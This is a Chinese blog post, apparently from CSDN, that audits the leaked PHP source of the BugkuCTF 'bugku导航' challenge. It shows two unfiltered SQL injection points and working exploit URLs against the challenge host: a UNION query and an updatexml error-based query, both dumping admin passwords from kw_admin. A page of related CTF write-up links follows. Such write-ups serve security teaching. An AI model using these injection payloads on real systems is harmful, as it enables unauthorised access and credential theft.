代码审计:bugkuCTF web进阶 bugku导航两处注入

最新推荐文章于 2024-09-05 11:17:06 发布
最新推荐文章于 2024-09-05 11:17:06 发布
阅读量975 收藏
点赞数 1
分类专栏: 代码审计 文章标签: php mysql 注入 web ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/105256209
版权

代码审计:bugkuCTF web进阶 bugku导航两处注入

bugku导航

bugku导航是bugkuCTF靶场中,web进阶的一道题,存在源码泄露,所以下下来审计一波。

https://ctf.bugku.com/challenges

在这里插入图片描述
下载源码:
(可以看到有个flag-asd.txt文件,如果只是想通关的话,在线访问这个文件即可得到flag值)

http://123.206.87.240:9006/1.zip

在这里插入图片描述
自行搭建,或者用bugku自己的网站也行。
在这里插入图片描述

代码审计

使用seay工具进行初步审计,根据可疑点回溯。
因为目标是拿到密码,所以主要关注sql注入。
后台admin的就不看了,前台疑似存在四处注入。
在这里插入图片描述
头两个是一样的,进入/include/smarty/plugins/function.list.php,关键代码如下:

<?php
function smarty_function_list ($params , &$smarty){
	$category = $params['category'];
		require ("../common/config.php");
	$sql = "SELECT * FROM `".$dbprefix."_sites` WHERE `Category` = ".$category;
	。。。
}
?>

可以看到sql语句的 $category 没有过滤直接使用,而 $category 来自 p a r a m s 数 组 , params 数组, paramsparams 通过传参进来。
全局搜索 smarty_function_list 函数,看一下调用之前有没有过滤操作。
在这里插入图片描述
很可惜,似乎并没有别的文件调用该函数。

/member/add.php 存在注入

那我们看到第三个,进入/member/add.php,关键代码如下:

<?php
require_once 'inc.php';
$user = $_SESSION['userlogin'];

$type = !empty( $_GET['type'] ) ? trim( $_GET['type'] ) : "";
if( $type == "newok" )
{
	。。。
}elseif( $type == "edit" )
{
	$usersites = $db -> select("SELECT * FROM `".$dbprefix."_favorite` WHERE `ID`=".$_GET['id']);
	$templates->assign("ID",$_GET['id']);
	$templates->assign("Name",$usersites[0]['Name']);
	$templates->assign("Link",$usersites[0]['Link']);
	$templates->assign("Order",$usersites[0]['Order']);
	$templates->assign("stype","editok");
	$templates->assign("title","�޸�վ��");
	$templates->display( templates ( 'add.tpl' ) );
}elseif( $type == "editok" )
{
	。。。
} else
{
	。。。
}
?>

可以看到 select 语句的 id 值直接get获取的,没有任何过滤,存在注入。
代码逻辑不难看出,在用户登录的状态下,访问 /member/add.php,在参数 $type 为 edit 值时,可构造 id 参数进行注入操作。

给出exp:

http://123.206.87.240:9006/member/add.php?type=edit&id=1 union select 1,group_concat(Name),group_concat(Password),4,5 from kw_admin

在这里插入图片描述

/member/admin.php 存在注入

最后看第四个注入点, 进入/member/admin.php, 关键代码如下:

<?php
require_once 'inc.php';

$type = !empty( $_GET['type'] ) ? trim( $_GET['type'] ) : "";
if( $type == "del" )
{
	$id = !empty( $_GET['id'] ) ? trim( $_GET['id'] ) : "";
	$db -> query("DELETE FROM `".$dbprefix."_favorite` WHERE `ID`=".$id);
	$templates->assign("msg","ɾ���û��Զ���վ��ɹ���<a href=\"#\" οnclick=\"history.go(-2);\">����</a>");
	$templates->display( templates ( 'msg.tpl' ) );
} else
{
	。。。
}
?>

可以看到 delect 语句的 id 值没有过滤,存在注入。
访问 /member/admin.php,在参数 $type 为 del 值时,可构造 id 参数进行注入操作。

delect 型的注入,所以我们选择报错注入,给出exp:

http://123.206.87.240:9006/member/admin.php?type=del&id=1 or updatexml(1,concat(0x7e,(select group_concat(Password) from kw_admin)),0)

在这里插入图片描述

CNwanku
关注
专栏目录
Bugku代码审计
nzw1134864657的博客
10-14 202
strcmp比较字符串 strcmp(a1,a2)函数用来比较两个字符串是否相等的, 比较的是对应字符的ascii码,如果相等返回0, 当a1的ascii大于a2的返回小于0,a1的ascii码小于a2的,返回大于0. 但是这个函数是存在漏洞的,我们知道这个函数是用来比较字符串的, 但是当我们传入为数组是,那变成字符串和数组进行比较了, 因此php在5.2之前,默认返回的-1,5.2版本之后返回0...
BugkuCTF(代码审计) WriteUp
CallMeSa1tyFish的博客
08-06 3731
代码审计部分 extract变量覆盖 题目 &amp;amp;amp;lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content){ echo'flag{xxx}'; }else{ ...
知名CTF赛事发布网站(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
bdfcfff77fa的博客
09-05 1038
2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.写在最后的话:“。祝你,祝我,祝我们,不管过去还是现在,科学都是对一切可能的事物的观察。所谓先见之明,是对即将出现的事物的认识,而这认识要有一个过程。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
bugku代码审计
极光时流
10-28 452
bugku代码审计extract变量覆盖strcmp比较字符串 extract变量覆盖 extract — 从数组中将变量导入到当前的符号表 int extract ( array &amp;amp;$array [, int $flags = EXTR_OVERWRITE [, string $prefix = NULL ]] ) 本函数用来将变量从数组中导入到当前的符号表中。 检查每个键名看是否可以作...
代码审计----bugku
小白的劝退之路
05-12 339
1.extract变量覆盖 <? php$flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } }?> Ex...
bugku 代码审计(1)
qq_35811830的博客
05-24 292
PHP中的include(),require()语句包含并运行指定文件 这两个语句在包含文件上完全一样,唯一的区别是对于错误的处理,require()语句在遇到包含文件不存在,或是出错的时候,就立即停止并报错,include()则继续运行 isset()函数用于检测变量是否已设置并且非null 如果已经使用unset()释放一个变量之后,在通过isset()判断将返回false 如果使用isset...
bugkuctf解题-WEB
05-04
CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序中...
BugkuCTF——最新web篇writeup(持续更新)
1匹黑马
11-16 3875
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
Bugku CTF梳理
lin的博客
04-10 1355
大佬的刷题记录:https://blog.csdn.net/mcmuyanga 1.CTF常见题型 CTF比赛通常包含的题目类型有七种,包括MISC、PPC、CRYPTO、PWN、REVERSE、WEB、STEGA。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 PPC(Professionally Program Coder)类型,即编程类题目,题目涉及到编程算法,相比ACM较为容易。 CRYPTO(Cryptography)
bugku web进阶。。buuctf web
gudugeji的博客
01-17 468
1 phpcmsv9 御剑扫描,访问.txt的网址,发现flag 2
Bugku 代码审计 wp
天跃
08-13 556
小白的总结,如有写错还请大佬们多指点,谢谢了! 代码审计: 1.extract变量覆盖 &lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { ec...
BugkuCTF-web进阶-实战2-注入 writeup
会下雪的晴天
07-14 1482
题目描述 解题传送门:http://www.kabelindo.co.id/ 解题思路 打开链接后得到个这个页面,注入,,,我一开始在搜索框内随意试试,发现没什么用,抓包也没啥结果。然后就逛逛这个网站看看哪里有注入点,找了一会,在页面的About-News里面发现数字型注入,话不多说,开始 注入嘛,老套路,两种方法 法一、手工注入 猜字段http://www.kabelindo.co....
Bugku CTF 代码审计 writeup(未完待续)
KRDecad3的博客
05-21 1945
Bugku CTF 代码审计 writeup(未完待续) 0x01extract变量覆盖 extract()函数功能:从数组中将变量导入到当前的符号表。使用数组键名作为变量名,使用数组键值作为变量值。 extract(array,extract_rules,prefix) 题中给出extract($_GET),相当于: $shiyan = $_GET[‘shiyan’] $flag...
Bugku bugku导航 writeup
n1109964492的博客
03-21 766
第一次写文章,如果有什么问题欢迎大家指出 打开上面的链接显示这样 第一步,我们先用扫描器扫描该网站有没有什么敏感文件或资源 我们发现扫出了1个admin、1.zip、robots.txt等等敏感文件目录 然后我们访问1.zip把该文件下载过来,然后下载解压后发现这个是该网站的源代码 这个时候,我们在看一下上面的题目提示,flag在根目录,是的,我们发现了这个东西 在本地打开该文件是没有任何...
BugkuCTF代码审计 writeup
Senimo
08-02 912
BugkuCTF代码审计 writeupextract变量覆盖strcmp比较字符串urldecode二次编码绕过md5()函数数组返回NULL绕过弱类型整数大小比较绕过sha()函数比较绕过md5加密相等绕过十六进制与数字比较变量覆盖ereg正则%00截断strpos数组绕过数字验证正则绕过简单的waf BugkuCTF链接 extract变量覆盖 strcmp比较字符串 urldecode二...
bugku 代码审计 write up
0verWatch的博客
02-17 2563
extract变量覆盖 查一下php手册 本函数用来将变量从数组中导入到当前的符号表中。 返回成功导入到符号表中的变量数目。 而且这个函数没还有任何参数,很危险,直接可以修改冲突的变量 关键的代码 构建的payload: ?shiyan=&amp;flag= 因为不知道flag里面什么内容,让它变成空,然后使content变成空,然后&nbsp;content变成空,然...
BugKuCTF_WEB题解报告
whatacutepanda的博客
03-19 5789
在学习CTF中,写点东西记录自己的学习,也算是一个反思吧。http://ctf.bugku.com/challenges                                                   web2:这个只用简单的按F12就能看到文件上传测试:我们首先随便传入一个PHP文件尝试一下发现提示说非图片文件那么我们再尝试传入一个图片然后我们思考一下题目要求说上传一个PHP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值